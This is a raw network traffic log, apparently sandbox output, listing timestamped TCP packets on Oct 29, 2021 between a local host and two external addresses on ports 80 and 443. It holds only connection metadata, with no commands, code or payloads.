Oct 29, 2021 20:50:02.512114048 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.513082027 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.513102055 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.513128042 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.513161898 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.513590097 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.513609886 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.513626099 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.513663054 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.513729095 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.514070034 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.514511108 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.514529943 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.514564991 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.514578104 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.514590025 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.514604092 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.514621019 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.514636993 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.514653921 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.514671087 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.514671087 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.514688015 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.514703989 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.514719009 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.514729023 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.514736891 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.514760971 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.514796972 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.531837940 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.539220095 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.592490911 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.942212105 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:02.942280054 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:02.942389965 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.015952110 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.015995979 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.055577040 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.055670977 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.060825109 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.060834885 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.061129093 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.146266937 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.762025118 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.804878950 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.857958078 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858062983 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858119011 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858138084 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.858165026 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858213902 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858237028 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858254910 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.858284950 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858297110 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858299971 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.858341932 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858371019 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858380079 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.858395100 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858433008 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.858458996 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858506918 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858535051 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858562946 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858583927 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.858597994 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858618975 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.858639002 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858649015 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.858666897 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858700037 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858740091 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858773947 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.858776093 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858788013 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858822107 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.858836889 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858840942 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.858846903 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858897924 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858906984 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.858918905 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858952045 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858980894 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.858993053 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.859004021 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.859035015 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.859066010 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.859066010 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.859076023 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.859097958 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.859123945 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.859148026 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.859154940 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.859167099 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.859225988 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.859227896 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.859241009 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.859286070 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.859291077 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.859301090 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.859347105 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.859365940 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.859378099 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.859391928 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.859420061 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.859483004 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.859503984 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.874968052 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.875092030 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.875122070 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.875188112 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.876413107 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.876475096 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.876527071 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.876550913 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.876578093 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.876627922 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.876636028 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.876672983 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.876718044 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.876725912 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.876740932 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.876754045 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.876761913 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.876780033 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.876784086 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.876806974 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.876817942 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.876838923 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.876863956 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.876916885 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.876926899 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.876940012 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.876995087 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.876996994 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.877021074 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.877069950 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.877073050 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.877085924 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.877099991 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.877124071 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.877130985 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.877147913 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.877159119 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.877176046 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.877181053 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.877227068 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.877233982 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.877252102 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.877286911 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.878200054 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.879528999 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.892719984 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.892817974 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.892890930 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.892954111 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.892999887 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.893044949 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.893079996 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.893136978 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.893162012 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.893215895 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.893251896 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.893301010 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.893312931 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.893321037 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.893340111 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.893393040 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.893403053 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.893579960 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.893584967 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.893598080 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.893677950 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.893682003 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.893721104 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.893740892 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.893752098 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.893800020 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.893841982 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.893862009 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.893877029 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.893882036 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.893917084 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.893927097 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.893950939 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.893973112 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.894018888 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.894041061 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.894054890 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.894073963 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.894083023 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.894110918 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.894134045 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.894145012 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.894164085 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.894169092 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.894176006 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.894228935 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.894229889 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.894242048 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.894289970 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.894293070 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.894349098 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.894356012 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.894370079 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.894402981 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.894417048 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.894462109 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.894474983 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.895224094 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.898608923 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.898649931 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.898720026 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.898736000 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.898750067 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.898808956 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.910588980 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.910656929 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.910713911 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.910738945 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.910777092 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.910800934 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.911191940 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.911329031 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.911367893 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.911452055 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.911525011 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.911562920 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.911614895 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.911633968 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.911649942 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.911696911 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.911781073 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.911794901 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.911818981 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.911919117 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.911932945 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.912256002 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.912273884 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.912286043 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.912333012 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.912353039 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.912368059 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.912379980 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.912419081 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.912429094 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.912430048 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.912468910 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.912484884 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.912498951 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.912524939 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.912564993 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.912565947 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.912589073 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.912647963 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.912661076 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.912687063 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.912698030 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.912731886 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.912749052 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.912767887 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.912776947 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.912789106 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.912805080 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.912852049 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.912890911 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.912905931 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.912925959 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.912992001 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.913002968 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.913029909 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.913039923 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.913050890 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.913089037 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.913105965 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.913130999 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.913141966 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.913157940 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.913167000 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.913199902 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.913219929 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.913260937 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.913273096 CEST	443	49817	162.159.130.233	192.168.2.4
Oct 29, 2021 20:50:03.913376093 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.913477898 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:03.916065931 CEST	49817	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:50:04.262103081 CEST	49818	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.314204931 CEST	80	49818	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:04.314337969 CEST	49818	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.314554930 CEST	49818	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.314567089 CEST	49818	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.393836021 CEST	80	49818	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:04.395345926 CEST	49818	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.396434069 CEST	49818	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.448422909 CEST	80	49818	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:04.452635050 CEST	49819	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.505232096 CEST	80	49819	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:04.505357981 CEST	49819	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.505575895 CEST	49819	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.505975962 CEST	49819	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.557671070 CEST	80	49819	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:04.557899952 CEST	80	49819	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:04.583762884 CEST	80	49819	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:04.584238052 CEST	49819	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.584489107 CEST	49819	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.620569944 CEST	49820	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.636518955 CEST	80	49819	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:04.671894073 CEST	80	49820	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:04.672075987 CEST	49820	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.672300100 CEST	49820	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.672312021 CEST	49820	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.751247883 CEST	80	49820	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:04.751749992 CEST	49820	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.751785994 CEST	49820	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.780879021 CEST	49821	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.803880930 CEST	80	49820	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:04.833600998 CEST	80	49821	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:04.833760977 CEST	49821	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.834038019 CEST	49821	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.834053993 CEST	49821	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.911092043 CEST	80	49821	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:04.911184072 CEST	49821	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.911358118 CEST	49821	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.941219091 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.963962078 CEST	80	49821	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:04.992974043 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:04.993093967 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.993262053 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:04.993271112 CEST	49822	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:05.044723988 CEST	80	49822	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:05.073988914 CEST	80	49822	185.98.87.159	192.168.2.4
